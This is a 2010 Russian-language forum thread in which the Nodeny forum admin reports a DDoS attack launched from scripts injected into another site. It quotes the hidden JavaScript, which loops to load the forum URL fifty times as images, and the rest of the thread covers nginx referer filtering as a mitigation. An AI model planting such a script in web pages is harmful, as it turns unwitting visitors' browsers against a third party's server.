Биллинговая система Nodeny

Главная категория => Курилка => Тема начата: versus от 28 Сентября 2010, 17:02:25



Название: Ддос атака с сайта www.file4all.ru на форум
Отправлено: versus от 28 Сентября 2010, 17:02:25
Добрый день!

На данный момент происходит дос атака с сайта www.file4all.ru на наш сервер, путем внедрения в код сайта невидимого скрипта
Код:
<div id="attack" style="display:none"><script type="text/javascript">
for(i=1; i<=50; i++) { document.write('<img
src="http://forum.nodeny.com.ua:80/index.php?' +  Math.random() +
'">'); } </script></div>
с  
http://www.file4all.ru/7145-eroru-1110-photoset.html и других страниц.

Владелец ресурса на контакт невыходит, чем обусловлена атака мне не известно.

До выяснения причин и остановки атаки форум может работать  с перебоями.


Название: Re: Ддос атака с сайта www.file4all.ru на форум
Отправлено: ankos от 28 Сентября 2010, 17:08:49
Вообщето уже ощущалось! >:(


Название: Re: Ддос атака с сайта www.file4all.ru на форум
Отправлено: Maks от 28 Сентября 2010, 18:43:12
А у мя норм работает.


Название: Re: Ддос атака с сайта www.file4all.ru на форум
Отправлено: VitalVas от 28 Сентября 2010, 20:59:10
пользователь блокирован, код удален


Название: Re: Ддос атака с сайта www.file4all.ru на форум
Отправлено: Aivanzipper от 29 Сентября 2010, 08:07:59
VitalVas, у тебя в подписи метода есть :)


Название: Re: Ддос атака с сайта www.file4all.ru на форум
Отправлено: stix от 29 Сентября 2010, 08:27:16
месть?


Название: Re: Ддос атака с сайта www.file4all.ru на форум
Отправлено: versus от 29 Сентября 2010, 10:00:31
Атака прекратилась, спасибо VitalVas.

Месть или нет, мне об этом не известно. Никаких угроз или предупреждений не было, на связь владелец не выходил, поэтому не знаю чем мы его обидели.



Название: Re: Ддос атака с сайта www.file4all.ru на форум
Отправлено: VitalVas от 29 Сентября 2010, 11:09:30
это скорее всего личная месть...


Название: Re: Ддос атака с сайта www.file4all.ru на форум
Отправлено: versus от 29 Сентября 2010, 11:54:57
Кстати благодаря этому инцененту дошли руки потестить нжинкс на отсеивание запросов по рефереру и количеству коннектов  с одного апи. Весьма мощная штукенция с регеспами и редиректами. Понравилось. Полностью аьтаку это не остановит, канала все равно занят, но отдавать пустую страницу по рефереру быстрее чем напрягать апач и мускул.
Так что нет худа без добра ))


Название: Re: Ддос атака с сайта www.file4all.ru на форум
Отправлено: ser970 от 29 Сентября 2010, 12:09:38
пользователь блокирован, код удален
VitalVas пользователь в реанимации или сразу в морг повезли?


Название: Re: Ддос атака с сайта www.file4all.ru на форум
Отправлено: Aivanzipper от 29 Сентября 2010, 12:13:05
Кстати благодаря этому инцененту дошли руки потестить нжинкс

Apache/2.2.9 (Debian) Phusion_Passenger/2.2.9 PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_wsgi/2.5 Server at forum.nodeny.com.ua Port 80

Где-же тут nginx? Или только в планах перевести на него?


Название: Re: Ддос атака с сайта www.file4all.ru на форум
Отправлено: VitalVas от 29 Сентября 2010, 12:24:05

Apache/2.2.9 (Debian) Phusion_Passenger/2.2.9 PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_wsgi/2.5 Server at forum.nodeny.com.ua Port 80

Где-же тут nginx? Или только в планах перевести на него?
C:\Documents and Settings\Admin> telnet forum.nodeny.com.ua 80
 <html>
<head><title>400 Bad Request</title></head>
<body bgcolor="white">
<center><h1>400 Bad Request</h1></center>
<hr><center>nginx/0.6.32</center>
</body>
</html>
C:\Documents and Settings\Admin>

VitalVas пользователь в реанимации или сразу в морг повезли?
та ну,я не такой....


Название: Re: Ддос атака с сайта www.file4all.ru на форум
Отправлено: stix от 29 Сентября 2010, 12:31:26
nginx в качестве прокси.
нагрузка в разы снижается


Название: Re: Ддос атака с сайта www.file4all.ru на форум
Отправлено: Andrey Zentavr от 30 Сентября 2010, 22:12:45
Кстати благодаря этому инцененту дошли руки потестить нжинкс на отсеивание запросов по рефереру и количеству коннектов  с одного апи. Весьма мощная штукенция с регеспами и редиректами. Понравилось. Полностью аьтаку это не остановит, канала все равно занят, но отдавать пустую страницу по рефереру быстрее чем напрягать апач и мускул.
Так что нет худа без добра ))
Поделитесь регекспами? :)


Название: Re: Ддос атака с сайта www.file4all.ru на форум
Отправлено: versus от 01 Октября 2010, 16:46:24
Регеспы лучше сесть и выучить, очень мощная штука для работы. Нужнане только прогерам но и админам :-)